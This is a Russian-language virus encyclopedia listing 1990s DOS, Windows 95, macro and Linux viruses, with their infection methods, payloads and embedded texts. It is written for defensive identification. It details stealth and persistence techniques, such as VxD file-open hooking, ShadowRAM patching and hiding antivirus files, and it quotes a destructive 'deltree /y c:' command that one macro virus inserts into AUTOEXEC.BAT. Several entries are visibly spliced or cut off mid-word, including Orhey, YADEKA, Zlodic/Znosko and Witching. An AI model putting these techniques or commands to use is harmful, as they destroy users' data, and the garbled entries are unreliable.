Опасный "резидентный" вирус, заражающий EXE-файлы в формате Portable Execute (Win95/NT). При старте инфицированного EXE-файла вирус пытается создать файл VVFS.VXD (в формате LE EXE) в каталоге C:\WIN95 или в C:\WINDOWS. Если таких каталогов не существует, то вирус "отказывается" от своей попытки поразить систему. При удачной попытке вирус записывает в файл VVFS.VXD свой вирусный код длиной 9262 байта в формате VxD- драйвера. Далее вирус открывает файл SYSTEM.INI и производит поиск строки "ice=" ("device="). Сразу же после данной строки вирус вставляет вызов своего файла-дроппера VVFS.VXD, причем вирус проверяет наличие данного вызова. После чего файл SYSTEM.INI закрывается и вирус возвращает управление программе-носителю. В результате, вирус в VxD- драйвере активизируется в системе только после первой же перезагрузки системы. После загрузки MS-Windows'95 вирус получает управление, остается в памяти, как системный VxD-драйвер и "перехватывает" открытие файлов (IFSFN_OPEN). В результате, все открываемые файлы, как в Win95, так и в DOS-окне будут контролироваться вирусом. Если открываемый файл находится в формате PE (Win95/NT-файл), то вирус пытается его заразить. При заражении вирус создает новую секцию в заголовке PE, которой присваивает имя QuantumG, записывает свое тело (10185 байт) в конец файла и правит секцию ресурсов и описание ресурсов в заголовке PE для возможности вызова функций KERNEL32 из вирусного кода.Вирус не заражает файлы у которых уже присутствует секция с именем QuantumG.При заражении вирус не контролирует расширения файлов, а только формат файлов.Поэтому в системе могут оказаться зараженными файлы с расширениями DLL,CPL,DRV, ... Различная длина вирусного кода при заражении VxD-дроппера и EXE- файлов связана с различным форматом LE и PE файлов, а также, формально, при заражении EXE-файлов вирус сначала записывает процедуру создания вирусного VxD-файла, а затем, непосредственно, и сам VxD-дроппер. Вирус содержит огромное количество ошибок, из-за которых его нормальная "жизнедеятельность" практически невозможна. Вирус содержит тексты:
c:\win95\system.ini
c:\windows\system.ini
c:\win95\system\vvfs.vxd
c:\windows\system\vvfs.vxd
QuantumG
Beating You to the Punch in the '97 (almost)

Win95.Zombie

Неопасный нерезидентный зашифрованный вирус, заражающий EXE-файлы в формате PortableExecutable. При старте инфицированного файла, вирусный декриптор расшифровывает основное тело вируса и отдает ему управление. Основной вирусный код определяет расположение в памяти KERNEL32 Export Table и сохраняет в своем теле адреса функций WIN32 KERNEL API, необходимых ему для заражения файлов. Далее вирус определяет командную строку запущенной инфицированной программы и запускает ее повторно с помощью функции WinExec. Вторая вирусная копия и будет производить дальнейшее заражение системы. А первая вирусная копия ( которая и произвела повторный запуск инфицированной программы) после отработки процедуры WinExec возвратит управление программе-вирусоносителю. Для заражения PE EXE-файлов вирус сканирует системный каталог Windows, а также проходит все каталоги дисков C:, D:, E: и F:. При нахождении PE EXE-файла, вирус производит его анализ, и если данный файл удовлетворяет некоторым условиям, то производится его заражение. Win95.Zombie создает новую сегментую секцию .Z0MBiE в заголовке PE, устанавливает на нее точку входа и записывает свой зашифрованный код в конец файла, в область данной сегментной секции. После заражения логического диска вирус создает в его корневом каталоге файл-дроппер ZSetUp.EXE с атрибутами: архивный и системный. В этот файл вирус Win95.Zombie записывает код вируса Zombie.1922 (см. описание вируса Zombie.1922). Вирус содержит тексты:
Z0MBiE 1.01 © 1997
My 2nd virii for mustdie
Tnx to S.S.R.
Z0MBiE`1668 v1.00 © 1997 Z0MBiE
Tnx to S.S.R.
ShadowRAM/Virtual Process Infector
ShadowRAM Technology © 1996,97 Z0MBiE
code................1398
viriisize...........4584
virtsize............8936

Wisconsin.815

Опасный нерезидентный вирус. Ведет счетчик запусков инфицированного файла. После 4 запусков вирус пытается уничтожить файлы *.PAS в текущем директории, после чего выводит текст "Death to Pascal.".

Witching.1400 (1,2)

Опасные нерезидентные вирусы. Удаляют файлы cHkLiS*.*. Первым делом пытаются заразить файлы ChKdSk.exE,802 Размещает свою TSR-копию в памяти по адресу 9000:A000h без коррекции MCB-блоков. Содержит строку "PC-FLU by WIZARD 1991".

Wizard.812, 2502

Неопасные резидентные вирусы. Wizard.2502 иногда проигрывает мелодию. Содержат текст "WIZARD".

WM - вирусы

Вирусы, заражающий текстовые файлы-документы в формате WinWord 6.0 или 7.0. Заражение системы вирусами происходит при открытии на редактирование зараженных DOC-файлов. При открытии файла-документа WinWord вызывает, находящиеся в этих документах вирусные макросы, которые написаны на языке WordBasic и в дальнейшем могут быть определены, как глобальные макросы. Данные макросы производят копирование вирусного тела - вирусных макросов при сохранении "старых документов" или вновь создаваемых через команду "Save As". Также данные вирусы могут производить поиск документов в формате WinWord и производить в них запись вирусных макросов. При выходе из WinWord происходит автоматическая запись вирусных глобальных макросов в DOT- файл (как правило, это файл NORMAL.DOT). Таким образом, при следующем старте WinWord снова автоматически загрузит вирусные глобальные макросы из файла глобальных макросов NORMAL.DOT.

WM.Alliance

"Родительская" копия вируса содержит макрос AutoOpen. При открытии зараженного документа обновляет SummaryInfo, записывая туда строку "You Have Been Infected by the Alliance". Не производя никаких проверок создает в Normal.Dot макросы AutoOpen и AutoNew и записывает в них свое тело. Т.о., копии вируса будут содержать уже два макроса с идентичным содержанием. 2, 11, 12 и 17 числа каждого месяца сразу после заражения Normal.Dot может перенести из него в свое тело макрос AutoOpen и сохранить текущий файл.

WM.Appder (1,2)

Очень опасные макро - вирусы. После 20 заражений удаляют файлы C:\DOC\*.EXE, C:\DOC\*.COM, C:\WINDOWS\*.EXE, C:\WINDOWS\SYSTEM\*.TTF, C:\WINDOWS\SYSTEM\*.FOT.

WM.Bandung

Очень опасный макро-стелс-вирус. Блокирует пункты меню работы с макросами. С 20 числа каждого месяца с 11:00 на диске C: удаляет файлы во всех каталогах (кроме WINDOWS,WINWORD и WINWORD6) до третьего уровня вложенности. Во время этого акта вирус выводит текст в строке статуса "Reading menu...Please wait !".После чего создает файл C:\PESAN.TXT, в который записывает текст:
Anda rupanya sedang sial, semua file di mesin ini kecuali yang berada di direktori WINDOWS dan WINWORD telah hilang, jangan kaget, ini bukan ulah Anda, tapi ini hasil pekerjaan saya...Barang siapa yang berhasil menemukan cara menangkal virus ini, saya akan memberi listing virus ini untuk Anda !!! Dan tentu saja saya akan terus datang kesini untuk memberi Anda salam dengan virus-virus terbaru dari saya...selamat ! Bandung,

WM.Boom

В теле вируса содержатся макросы AutoExec, DateiSpeichernUnter ("FileSaveAs") и System. Заражение NORMAL.DOT происходит при вызове FileSaveAs. Макро AutoOpen устанавливает процедуру обработки таймера, которая в свою очередь, в 13:13:13 выполняет макрокоманду System. System изменяет строку основного меню, предполагая, что она написана на немецком языке. В результате имена пунктов образуют строку:
Mr. Boombastic and Sir WIXALOT are watching you ! ! !
Т.о., "Datei" ("File") заменяется на "Mr. Boombastic", "Bearbeiten" ("Edit") на "and", а "?" - на последний "!". Замена каждого пункта меню сопровождается небольшой задержкой и системным гудком Windows. После этого вирус выводит фразу:
Mr. Boombastic and Sir WIXALOT : Don`t Panik, all things are removeable !!! Thanks VIRUSEX !!!
создает новый файл, записывает в него разными шрифтами и с отступами следующий текст:
Greetings from Mr. Boombastic and Sir WIXALOT !!!
Oskar L., wir kriegen dich !!!
Dies ist eine Initiative des Institutes zur Vermeidung und
Verbreitung von Peinlichkeiten, durch in der Цffentlichkeit
stehende Personen, unter der Schirmherrschaft von Rudi S. !
и выводит этот файл на принтер. После этого установки и вид меню сбрасываются в состояние по умолчанию. В теле макроса System содержится ряд закомментированных команд, которые на время вирусных эффектов переименовывает C:\AUTOEXEC.BAT в C:\BOOMBAS.TIC, C:\CONFIG.SYS в C:\SIR_WIXA.LOT и C:\COMMAND.COM в C:\FANTAS.TIC, а перед выводом на принтер возвращают файлам первоначальные имена. Этот код никогда не выполняется.

WM.Buero

Написан для немецкоязычной версии Word for Windows, содержит макросы BьroNeu и DateiSpeichern. При заражении файлов переносит свои макросы в файл, записывая их под другими именами, комбинируя "BьroNeu", "DateiSpeichern" и "AutoOpen". Если текущая дата больше 15.08.1996, переименовывает C:\IO.SYS в C:\IIO.SYS и уничтожает все файлы с расширением *.doc.

WM.Cap

Зашифрованный стелс-вирус. Блокирует пункты меню работы с макросами и удаляет ссылки на эти меню. Запрещает выполнение макроса AutoOpen при открытии документов. При попытке сохранения инфицированного документа с помощью команды FileSaveAs вирус записывает на диск абсолютно пустой документ. Вирус содержит текст:
C.A.P: Un virus social.. y ahora digital..
"j4cKy Qw3rTy" (jqw3rty@hotmail.com).
Venezuela, Maracay, Dic 1996.
P.D. Que haces gochito ? Nunca seras Simon Bolivar.. Bolsa !

WM.Concept (1-4, 7-9)

При первом просмотре или редактировании инфицированного документа появляется MessageBox с цифрой 1 внутри. Вирус содержит макросы, имеющие имена AutoOpen, AAAZAO, AAAZFS, FileSaveAs, PayLoad. Зараженный файл-документ содержит тексты:
see if we're already installed
WW6Infector
iWW6IInstance
AAAZFS
AAAZAO
That's enough to prove my point
В зараженной системе в файле WINWORD6.INI имеется строка "WW6I= 1".

WM.Concept (5)

Вариация на тему WordMacro.Concept (1). Содержит макросы AutoOpen, EditSize (оба - инсталляция вируса), HaHa (признак зараженности файла) и FileSort. При запуске FileSort вирус стирает его содержимое, выводит большими буквами текст:
i said:
say goodbye to all your stuff
(look at that hard drive spin!)
заражает файл и 100 раз подряд выполняет команду FileSave. Утраченный текст восстановить невозможно.

WM.Concept (6)

Содержит макросы AutoOpen, Boom, F1 и F2. Макрокоманда Boom из тела вируса не вызывается и может быть выполнена только в том случае, когда пользователь сам этого захочет. Тогда будет выведен MeassageBox с заголовком "AFA" и текстом "Fight Racism; Smash Fascism".

WM.Daddy

В теле вируса содержатся макросы Gangsterz и Paradise, котоpые получают упpавление только в том случае, если пользователь сам запустит их на выполнение. Оба макpоса пеpехватывают сообщения, поступающие от клавиатуpы (устанавливают клавиатуpные макpосы) и инфициpуют NORMAL.DOT. После этого пpи каждом нажатии на пpобел будет запускаться Gangsterz, на клавишу 'E' - Paradise. Пpи запуске макpоса Gangsterz виpус создает файл XOP.BAT, заpажает его виpусом BAT.Xop.367, если в секции "Intl" файла WIN.INI не пpисутствует стpока "XOP=Installed" и записывает в WIN.INI эту стpоку. После этого вставляет в AUTOEXEC.BAT стpоки
@echo off
Drive:\Path\XOP.BAT
где Drive:\Path - полный путь к фалу XOP.BAT. Макpос Paradise пpовеpяет текущую дату и 15 янваpя уничтожает NORMAL.DOT, записывая в него стpоку "Big_Daddy_Cool Virus generated by NJ" и в "вечном цикле" вставляет в него букву "O", пpедваpительно запpетив pеакцию на нажатие клавиш.

WM.Daniel (1,2)

Макро-стелс вирус. Переопределяет меню File|Save и нажатие на клавиши Ctrl-S, Ctrl-B на свой макрос. Данный макрос заражает текущий документ, добавляя в его FileSummaryInfo поля: Keywords = "Daniel_Stone", Comments = "All information should be free." Вирус удаляет пункты меню работы с макросами и, таким образом, прячет наличие своих макросов в системе. Содержит тексты:
REM This is the Word_Macro_Virus_Daniel_1D - Have a nice Day!
REM Please Suport the Virus Concept.

WM.Demon

В документах содержит макрос AutoOpen и 2 макроса со случайными именами, в NORMAL.DOT - AutoClose и также 2 макроса со случайными именами. Имена же эти хранит в переменных документа или в файле WIN.INI. С мая до января удаляет себя из документов и шаблонов. Если в документе имеется выделенный текст "Dark Master calling", то вирус выводит окно с сообщением:
Microsoft WinWord DEMON
WINWORD HIDDEN DEMON
is happy to see his MASTER!!!
GREAT DAY !!!
This file is infected as #

WM.GoldFish

Содержит практически совпадающие макросы AutoOpen и AutoClose. При заражении производит проверку наличия в файле макросов с такими именами и атрибутом "ExecOnly". Если в документе находится макрос,имеющий такие атрибуты и имя, совпадающее с AutoOpen или AutoClose, соответствующий вирусный макрос в документ не переносится. Если текущий год - 1996 или больше, каждый из вирусных макросов с вероятностью 1/500 выводит диалоговое окно с заголовком "GoldFish" и текстом "I am the GoldFish, I am hungry, feed me." и ждет ввода одного из слов "fishfood", "worms", "worm", "pryme" или "core".

WM.Irish

Содержит макросы AutoOpen (заражение NORMAL.DOT), WordHelp, WordHelpNT (оба - визуальные эффекты) и AntiVirus, который при запуске из NORMAL.DOT заражает открытый файл и выдает системный гудок Windows. WordHelp и WordHelpNT при активизации изменяют и сохраняют цветовые и некоторые другие настройки дисплея.

WM.MadDog

Содержит макросы AutoOpen, AutoExec, AutoClose, FileClose, AOpnFinish и FCFinish. Все макросы, кроме AutoClose, в качестве "шапки" содержат строки:
--------------------------------------------------------
Microsoft Word for Windows 95 "MadDog" Macro Set
v 1.0, March l996
--------------------------------------------------------
© Copyright Microsoft Corporation, 1995
Заражает файлы довольно запутанным способом, похожим на упражнения в структурном программировании на WordBasic. При этом используются временные файлы с именами "Temp.Dot" и "FileName.Dat" и вызовы вирусных макросов, как подпрограмм. Поскольку временные файлы создаются, записываются и сохраняются средствами WordBasic, для маскировки факта работы с ними вирус сбрасывает список MRU (Most Recently Used files - наиболее часто используемых файлов) в меню Files.Перед закрытием файлов в период с 20.00 до 20.59 вирус "убивает" текст, меняя все буквы "e" ("E") на "a" и сохраняет файл. При заражении файлов никаких проверок не производится.

WM.MDMA

Вирус инсталлируется при закрытии файла (вызов AutoClose). В Normal.Dot переносится макрос AutoClose.Если такой макрос содержится в Normal.Dot, то вирус считает, что система уже заражена. 1 числа каждого месяца определяет платформу, под которой работает, и в зависимости от нее предпринимает различные действия:
Windows95 : удаляет файл C:\SHMK, файлы C:\WINDOWS\*.HLP и
C:\WINDOWS\SYSTEM\*.CPL и меняет некоторые настройки,
задаваемые группами Control Panel и Network.

Windows NT: удаляет файл C:\SHMK и все файлы текущего каталога.

Windows : удаляет файл C:\SHMK и записывает в AUTOEXEC.BAT следующие
строки:
@echo off
deltree /y c: ; (удаление дерева каталогов на C: без
; подтверждения)
@echo You have just been phucked over by a virus

Macintosh : уничтожает MacID$("****") ???
Независимо от предпринятых действий при закрытии инфицированного файла будет выведен MessageBox с текстом "You are infected with MDMA_DMV. Brought to you by MDMA (Many Delinquent Modern Anarchists)." , имеющий заголовок "MDMA_DMV".

WM.NJ.based

Вирусы, созданные с помощью NJ-WMVCK v1.1 (Nightmare Jokerяs Word Macro Virus Construction Kit) - немецкоязычным генератором MACRO-вирусов. При открытии запрашивает имя файла, в который будет записан создаваемый вирус и язык для диалогов (немецкий или английский, выбор последнего влечет за собой сообщение о том, что эта возможность еще не реализована). После выдачи нескольких информационных сообщений продолжает диалог и просит ввести текстовую строку и имя макроса, который будет служить признаком зараженности. В этот макрос будет записан код, заражающий DOS одним из 10 файловых вирусов. Список DOS- вирусов содержит несколько творений, созданных с помощью известных программ-конструкторов вирусов (VirusConstructor.based),генераторов MTE и SMEG, вирусы Casino.2330, Tequila, Neurobasher.Tremor и Win95.Boza. Имя вируса запрашивается дополнительно. После этого в указанный файл записывается текст "A New Life! Nightmare Joker!", формируется и переносится текст MACRO-вируса и оба файла (только что созданный и файл -конструктор) закрываются. Генератор содержит ряд неточностей и погрешностей, в результате которых на любом этапе работа может быть прервана сообщениями об ошибках Word Basic'а. Так, например, для ввода одной строки выводится многострочный InputBox, имя создаваемого файла всегда дополняется строкой "C:\" и т.д.

WM.Orhey

Hабоpы макpосов этого виpуса pазличаются в глобальных шаблонах и заpажаемых документах. Пеpвоначальная копия содеpжит макpосы AtExc, FlOpvvv, FISvv, AutoOpen, FileExit, TlsMcr и FlSvvs (набоp 1). Пpи откpытии заpаженного файла получает упpавление макpос AutoOpen. Он пpоизводит пpовеpку заpаженности главного шаблона, и, если в нем не содеpжится макpоса с именем ImpRovevvvv5, пеpеносит в него свое тело, изменяя имена макpосов (набоp 2):
AutoOpen -> ImpRovevvvv5
AtExc -> AutoExec
FlOpvvv -> FileOpen
FlSvvs -> FileSaveAs
FlSvv -> FileSave
TlsMcr -> ToolsMacro
FileExit -> FClccc
Макpо AutoExec содеpжит дестpуктивный эффект,котоpый должен сpабатывать 22 мая 1998 года. Пpедполагается вывод Message Box с заголовком "GreenPeace Virus" и текстом:
Belik Natasha demands:
Stop pollution of an environment!!!!!
Protect ozonian layer!!!
Rescue Volga!!!
Pay the salary!!!!!
После этого будут уничтожены файлы по маске "*.HLP" и подана команда ExitWindows. Пpи pаботе с документом в инфициpованной системе пpоисходит стандаpтное его заpажение пpи вызове макpоса FileSaveAs, пpи этом виpус копиpует макpосы из шаблона в документ, изменяя их имена на имена из набоpа 1. Макpос FileOpen пpовеpяет поле Author потока Summary Info откpываемого документа. Если имя автоpа Igor Daniloff, виpус ищет в документе макpосы AutoOpen и iDrWebScan, котоpые содеpжатся в вакцине Dr.Web for WinWord веpсии 1.0. Пpи нахождении AutoOpen виpус пеpезаписывает его содеpжимое и вставляет код, котоpый пpи запуске макpоса должен вывести Message Box с заголовком "DrWeb for WinWord" и текстом:
" In the WinWord6.0/7.0rus environment "
" the viruses are not distributed "
(что действительност

0

24

X

X-Mrei.866, 1405

Неопасные резидентные шифрованные (X-Mrei.1405 - полиморфный) вирусы. Не заражают файлы, содержащие в своем имени буквосочетания AIWEANIN. Выводят на экран строку "X-Mrei 7".

XAM.278

Заражает EXE-файлы весьма оригинальным способом. Вирус внедряет свой код в область таблицы перемещаемых символов (relocation table), изменив три байта сигнатуры EXE-файла 'MZ' на JMP NEAR. Но самое интересное то, что вирус использует для заражения INT 16h. Перехватывая данное прерывание вирус контролирует дисковые буферы DOS, просматривает всю цепочку дисковых буферов и если обнаруживает в каком-нибудь из них признаки заголовка EXE-файла, то внедряет свой код в заголовок EXE, находящийся в этом буфере и устанавливает признак "загрязненности" буфера. Т.е., если данный буфер используется для записи, DOS запишет заголовок EXE-файла вместе с вирусом на диск.

Xtac.1564

Опасный резидентный вирус. После 24 числа каждого месяца удаляет файлы, расширение которых отличается от расширений, указанных в следующей текстовой строке "COMEXESYSBATOBJOVROVLINICFGTPUHLPTPLBGICHR". Содержит текст "good news! you have justbeen smitten by XTAC - lyndon siao, usc-tc"

Xyz.1561

Неопасный резидентный, пытающийся быть невидимым, вирус. В пятницу может вывести слово из 3 букв, коее очень умные люди привыкли писать на заборах.

0

25

Y - Z

YADEKA.Demo

Опасный резидентный вирус. Из-за ошибки разрушает около половины всех заражаемых файлов. Выводит текст "This file infected with [yet another data encryption kernel advance] demo virii". Также содержит текст "[yet another data encryption kernel advance]тор диска C: троянскую программу, форматирующую 3 раза разными способами первую дорожку диска C:. После записи "троянца" вирус выводит текст: "Andy Said:Zarin`iS dangerous!".

ZeroBug.1536

Неопасный резидентный вирус. Иногда запускает рожицу (ASCII 1), которая двигается на экране и стирает все символы '0'.

Zhengxi.7271, 7307, 7313

Неопасные резидентные полиморфные стелс-вирусы. Инфицированные файлы содержат два "длинных" полиморфных расшифровщика. Первый декриптор расшифровывает основное тело вируса и второй декриптор, после чего отдает управление второму декриптору, который продолжает расшифровывать основной вирусный код. Расшифровка производится не последовательно байт за байтом или слово за словом, а произвольными "прыжками" по всему телу вируса. При получении управления основной вирусный код перехватывает INT 01 и трассирует оригинальный обработчик INT 21h. Данная трассировка производится для поиска определенной последовательности байт, присутствующих, как правило, во всех версиях DOS. При нахождении данной последовательности байт вирус внедряет в оригинальный обработчик INT 21h косвенный межсегментный CALL на "длинный" прямой JUMP, находящийся также в оригинальном обработчике. Данный JUMP указывает на вирусный обработчик INT 21h. В дальнейшем резидентная копия может "перемещаться" по различным сегментам памяти, в том числе, и в области UMB. После перехвата INT 21h вирус строит два полиморфных расшифровщика для восстановления исходных 22 байт заголовка инфицированного EXE-файла. При заражении файла вирус шифрует данные байты с помощью полиморфных механизмов, основанных на некоторых случайных стартовых значениях. При восстановлении данных байтов вирус также использует данные полиморфные механизмы. Для файлов, инфицированных описанным выше методом, активный резидентный вирус использует стелс-алгоритмы. Но также вирус использует еще один вариант заражения EXE-файлов, длина которых больше 32K. При заражении таких файлов вирус считывает 6144 байт, следующих сразу за EXE-заголовком и пытается найти последовательность байт, обычно используемых в процедурах, написанных на языках высокого уровня. Если данные байты найдены, то вирус производит некоторые дополнительные проверки и внедряет вместо байт процедуры 84 байта собственного кода, сохранив предварительно оригинальный программный код, шифрует полиморфным методом основной вирусный код, который записывает в конец файла-жертвы. Внедренный в середину программы код из 84 байт, при получении управления, определяет имя стартовавшей программы, устанавливает указатель на смещение вирусного тела в файле, считывает из него 112 байт кода в область программного стека, расшифровывает его и передает ему управление. Данный 122-байтный код считывает из файла исходные 84 байта программной процедуры в их "законное" место и также расшифровывает их. Затем вирус пытается получить свободный блок памяти, (возможно в области UMB) и читает из инфицированного файла в этот блок памяти полиморфнозашифрованный основной вирусный код и передает ему управление. После собственной расшифровки вирус перехватывает INT 21h, описанным выше способом и возвращает управление программе- вирусоносителю. Т.о., вирус из такой инфицированной программы может "выпрыгнуть", может "не выпрыгнуть" или "выпрыгнуть" при определенных условиях, например, при задании определенного ключа в командной строке. Для таких инфицированных файлов стелс-алгоритм вируса не работает. Т.к., для файлов инфицированных первым способом, вирус "включает" стелс-механизм, то, например, при архивировании зараженных EXE-файлов в архивных файлах окажутся уже "здоровые" файлы. Но автор вируса предусмотрел и этот вариант. При запуске некоторых архиваторов (ARJ, ZIP,..) для архивации файлов вирус создает файл со случайным именем от 2 до 5 букв и расширением COM, и записывает в него свою полиморфную копию. В результате архивный файл, наряду с "излеченными" EXE-файлами будет содержать и COM-файл с телом вируса. При запуске такого файла будет выведено сообщение "Abnormal program termination".Вирусы содержат текст:
The Virus/DOS 0.54 Copyright © 1995 Zhengxi Ltd
Warning! This program for internal use only!
Для пострадавших от данного вируса привожу имя их создателя:
Денис Петров 2:5030/287.14.

Zipper.2779 (1-3)

Неопасный резидентный вирус. Первым делом пытается заразить файлы \COMMAND.COM, \DOS\FORMAT.COM. Внутри себя содержит ZIP-архив с файлом ZIPPER.ASM. При трансляции данного исходного текста (ZIPPER.ASM) получается неопасный резидентный вирус Zipper.303. Zipper.2779 содержит текст ">>*>> Use PKUNZIP *.EXE immediately! <<*<<".

Zlodic.666

Неопасный нерезидентный вирус. 13 марта раскрашивает экран в цвета российского флага и выводит текст:
-=SPARTAK(MOSCOW) - CHAMPION FOREVER!=-=СМЕРТЬ кОНЯМ и мУСОРАМ=-
Также содержит в своем теле тексты:
Kolya lives ..
Очень опасные нерезидентные (Znosko.1730 - шифрованный) вирусы.Заражают COM (Znosko.1730 также EXE) файлы на всех дисках во всех доступных каталогах за один проход. При заражении файлов используют файловые функции FCB INT 21h. Znosko.1372, 1380 после 19 числа месяца разрушают все файлы на дисках. Znosko.1311, 1418 после 11 числа месяца переименовывают все найденные файлы в файлы с именами типа AAAAAAAA, BAAAAAAA, BBAAAAAA,... Znosko.1372, 1380, 1418 содержат текст "Find FizFuck". Эти вирусы оставляют метку своего пребывания на дисках в виде файлов IMAGE.IDX или WSURC.DMA в корневом каталоге.При нахождении таких файлов на диске вирусы повторные попытки заражения такого диска принимают значительно реже. Znosko.1730 пытается найти файл C:\WIN95\WRIVDR.CNF, и если находит его, то считывает 2000 байт этого файла в память и отдает ему управление по смещению 0. Znosko.1730 пытается уничтожить файлы *.CPP, *.BAK и *.C, записывая в них текст "Сpочно обpатитесь к администатоу сети.". Znosko.509 выводит на экран текст "Zarina Tamara".

Zombie.1922

Опасный резидентный зашифрованный вирус. Является "продуктом жизнедеятельности" вируса Win95.Zombie. Но в дальнейшем может "жить собственной полноценной жизнью". Win95.Zombie создает файлы ZSetUP.EXE в корневых каталогах инфицируемых дисков. При запуске такого файла ZSetUP.EXE вирусный код получает управление и пытается выяснить сможет ли он (вирус) открыть на запись RAM Shadow. Далее производится попытка найти блок свободной памяти (нулевых байт) длиной 2122 байта в сегменте 0C000h. Если ему это не удается, то вирус выясняет адрес расположения системного фонта размером 8x14. Если данный фонт находится в сегменте 0C000h, а также если адрес оригинального обработчика INT 13h находится в сегменте 0F000h, то вирус открывает RAM Shadow на запись и записывает свой код в область нулевых байт или в область системного фонта 8x14. Затем вирус модифицирует оригинальный обработчик INT 13h, внедряя в него команду передачи управления на собственную процедуру. После этого RAM Shadow "закрывается" - запись в нее становится невозможной. При чтении сектора (f.2 Int 13h) с начальной сигнатурой "MZ", вирус "перехватывает" INT 21h, обработчик которого заражает в дальнейшем все запускаемые или открываемые на чтение или запись EXE-файлы. При чтении секторов, содержащих элементы каталогов или файлов, вирус производит поиск последовательности байт: ADINF, AIDS, AVP, WEB, DRWEB, °°°, CPP, C, S-ICE, TD, DEBUG, WEB70801, CA. В случае нахождения таковых вирус устанавливает в прочитанном секторе для найденного элемента первый байт 0E5h - признак удаленного файла и "забивает" дальнейшее имя нулями. Таким образом, при активном вирусе операционная система не будет даже подозревать о наличии данных файлов на диске. Вирусные обработчики INT 13h и INT 21h при получении управления "открывают" RAM Shadow, производят свои действия и обратно "закрывают" RAM Shadow. Без соответствующих манипуляций с теневой памятью удалить или обезвредить вирусный код в памяти не предоставляется возможным. При обнаружении данного вируса в памяти следует произвести лечение системы, загрузившись с диска, с "чистой" операционной системой. Следует отметить, что вирусу Zombie.1922, видимо, удастся открыть RAM Shadow на большинстве современных материнских плат, имеющих процессор Pentium. Вирус содержит тексты:
Z0MBiE`1668 v1.00 © 1997 Z0MBiE
Tnx to S.S.R.
ShadowRAM/Virtual Process Infector
ShadowRAM Technology © 1996,97 Z0MBiE

Zombie.16384

Неопасный нерезидентный полиморфный вирус. Алгоритм работы полиморфного генератора очень похож на алгоритмы вирусов Ply и Tmc. Zombie.16384 производит поис и заражение COM-файлов в текущем каталоге. При старте инфицированной программы вирус создает в памяти строку текста, которую потом сразу же "забивает нулями": "ZCME 0.01 Z0MBiE`s Code Mutation Engine © 1997". Вирус проходит своим встроенным дизассемблером по собственному коду и записывает в случайные адреса памяти, выделенного 16K буфера, блоки из ассемблерных инструкций случайной длины. Данные блоки вирус "разбавляет" командами NOP. Для связывания между собой этих блоков вирус использует команду безусловного перехода JMP. Таким образом, 1346-байтный вирус оказывается "разбросанным" по 16K буферу. Данный буфер вирус записывает в начало инфицируемых файлов.

Zu.473

Опасный резидентный вирус. 13 июня выводит сообщение "Format ..." и пытается уничтожить содержимое всех секторов нулевой головки жесткого диска.

0

26

Новенькое

Checkbox.936
Опасный резидентный вирус. Первым делом пытается заразить файл C:\DOS\SMARTDRV.EXE. При появлении на экране строк "checkboxports", "givegodmode", "iamtheboss" вирус предпринимает некоторые действия по переводу консоли на COM-порт, через который, возможно, соединение взломщика с инфицированным компьютером.
Dotter.3961
Неопасный резидентный шифрованный вирус. Иногда может вывести на экран одно из приведенных ниже высказываний:

"Не богатей дуpными сpедствами" (Фалес).
"Чем поддежал ты своих родителей, такого жди и от детей" (Фалес).
"Заводи друзей не спеша, а заведши, не бросай" (Солон).
"Не злословь о ближнем, чтобы не услышать такого, чему сам не порадуешься" (Хилон из Спарты).
"Что лучше всего? Хорошо делать, что делаешь" (Питтак)
"Только больная душа может быть глуха к чужой беде" (Бинат).
"Цивилизация - это совокупность духовных, материальных и нравственных средств, которыми данное сообщество вооружает своего члена в его противостоянии внешнему миру" (М.Барг).
"Если для создания социализма требуется определенный уровень культуры... то почему нам нельзя начать сначала с завоевания революционным путем предпосылок для этого определенного уровня, а потом уже, на основе рабоче-крестьянской власти и советского строя, двинуться догонять другие народы" (В.Ленин).
"Пришло несчастье - человек сам его породил, пришло счастье - человек сам его вырастил. У несчастья и счастья одни двери, польза и вред - соседи" (Конфуций).
"Мир - это священный сосуд, которым незьзя манипулировать. Если кто хочет манипулировать им, уничтожит его" (Дао) .
Запад есть Запад, Восток есть Восток,
не встретиться им никогда.
Лишь у подножья Престола Божья
в день Страшного Суда. (Р.Киплинг)
"Кто покупает ненужное, тот скоро продаст необходимое" (Б.Франклин).
"Помните, что время - это деньги" (Б.Франклин).
"Следуй pеке, начиная с ее истоков. Истина сегодня-завтpа окажется ложью" (Ф.Паулюс).
"За ошибки госудаpственных деятелей pасплачивается вся нация" (Н.Беpдяев).
Весь мир - театр.
А в нем женщины, мужчины - все актеры.
У них есть выходы, уходы.
И каждый не одну играет роль.
Семь действий в пьессе той.
Младенец, школьник,юноша, любовник,
Солдат, судья, старик. (Шекспир)
- "Человеческое достоинство нерушимо.Уважать и защищать его - обязанность всякой государственной власти" (Конституция ФРГ, ст. # 1)
- "Государственная власть основывается на непоколебимим доверии народа, ее авторитет исходит от народа, ее полномочия осуществляются посредством народа, а благами ее пользуется народ" (из Конституции Японии)
- "Вся власть в СССР принадлежит народу" (Конституция СССР 1977 г., ст. 2)
"Неча на зеркало пенять, коль рожа крива" (про тебя)
Без пищи человек живет пять недель, без воды - пять дней, без воздуха - пять минут
                                                               
C2H5OH = ИСТОЧНИК ВЕЧНОГО ВДОХНОВЕНИЯ

     ExcelMacro.Legend
Неопасный макро-стелс-вирус. Удаляет пункт меню "Tools|Macro". Если UserName="Pyro" и OrganizationName="VBB", то вирус прекращает работу и файлы не заражает. Может вывести сообщение:

Pyro [VBB]
You've Been Infected By Legend!
ExcelMacro.Robocop
Опасный макро-вирус. Первого марта вирус помещает в текущую таблицу текст "ROBOCOP Nightmare Joker [SLAM]".
ExcelMacro.Yohimbe
Опасный макро-вирус. Записывает строку "Yohimbe" в заголовок заражаемой таблицы. В 16:45 вставляет в текущую таблицу картинку и текст: FUCK YOU BUDDY".
Linux.Bliss.17892, 18064
Неопасные нерезидентные вирусы,"обитающие" в среде Linux (разновидность ОС Unix) и заражающие исполняемые файлы в формате ELF.Написаны на языке GNU C. Внедряются в начало ELF-файлов, сдвигая программный код вниз. В конец инфицированных файлов вирусы записывают тексты:

Linux.Bliss.17892: infected by bliss: 00010002:000045e4
Linux.Bliss.18064: infected by bliss: 00010004:000048ac

В процессе своей "работы" вирусы могут вывести сообщения:

already infected
skipping, infected with same vers or different type
replacing older version
replacing ourselves with newer version
infecting: bytes
infect() returning success
been to already!
traversing
our size is
copy() returning success
copy() returning failure
disinfecting:
not infected
couldn't malloc bytes, skipping
couldn't read() all bytes
read bytes
happy_commit() failed, skipping
couldn't write() all bytes, hope you had backups!
successfully (i hope) disinfected
Debugging is ON
Disinfecting files...
using infection log:

